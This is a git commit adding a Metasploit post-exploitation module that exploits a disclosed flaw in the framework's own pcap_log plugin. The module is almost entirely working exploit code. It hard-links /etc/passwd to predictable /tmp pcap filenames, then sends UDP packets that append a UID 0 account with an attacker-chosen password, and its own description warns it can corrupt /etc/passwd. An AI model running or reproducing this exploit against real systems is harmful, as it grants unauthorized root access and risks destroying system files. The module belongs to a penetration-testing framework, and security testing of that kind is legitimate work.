Merge branch 'module-metasploit-pcaplog-privesc' into rapid7-master

2012-10-29 11:32:32 -05:00 · 2012-10-29 11:32:32 -05:00 · 5c0fb2789f
parent a8d494ce1c 65e27ff38a
commit 5c0fb2789f
1 changed files with 112 additions and 0 deletions
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@ -0,0 +1,112 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/local/unix'
+
+class Metasploit3 < Msf::Post
+	Rank = ManualRanking
+
+	include Msf::Post::File
+	include Msf::Post::Common
+
+	include Msf::Exploit::Local::Linux
+	include Msf::Exploit::Local::Unix
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'	  => 'Metasploit pcap_log Local Privilege Escalation',
+				'Description'   => %q{
+					Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
+					creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
+					filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
+					This, and all the other packets, are appended to /etc/passwd.
+
+					Successful exploitation results in the creation of a new superuser account.
+
+					This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
+					files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
+					a permanent DoS on the target by corrupting the /etc/passwd file.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
+				'Platform'      => [ 'linux','unix','bsd' ],
+				'SessionTypes'  => [ 'shell', 'meterpreter' ],
+				'References'    =>
+					[
+						[ 'BID', '54472' ],
+						[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
+						[ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
+					],
+				'DisclosureDate' => "Jul 16 2012",
+				'Targets'       =>
+					[
+						[ 'Linux/Unix Universal', {} ],
+					],
+				'Stance' => Msf::Exploit::Stance::Passive,
+				'DefaultTarget' => 0,
+			}
+			))
+			register_options(
+			[
+				Opt::RPORT(2940),
+				OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
+				OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]),
+				OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5])
+			], self)
+	end
+
+	def normalize_minutes
+		datastore["MINUTES"].abs rescue 0
+	end
+
+	def run
+		print_status "Setting up the victim's /tmp dir"
+		initial_size = cmd_exec("cat /etc/passwd | wc -l")
+		print_status "/etc/passwd is currently #{initial_size} lines long"
+		i = 0
+		j = 0
+		loop do
+			if (i == 0)
+				j += 1
+				break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
+				# 0a2940: cmd_exec is slow, so send 1 command to do all the links
+				print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
+				cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
+			end
+			current_size = cmd_exec("cat /etc/passwd | wc -l")
+			if current_size == initial_size
+				# PCAP is flowing
+				pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
+				vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
+				udpsock = Rex::Socket::Udp.create(
+				{
+					'Context' => {'Msf' => framework, 'MsfExploit'=>self}
+				})
+				res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
+			else
+				break
+			end
+			sleep(1) # wait a second
+			i = (i+1) % 60 # increment second counter
+		end
+
+		if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+			print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
+			# TODO: Consider recording our now-created username and password as a valid credential here.
+		else
+			print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
+		end
+		# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
+		#	  However beceause the session is not a terminal, su will not always allow this.
+	end
+end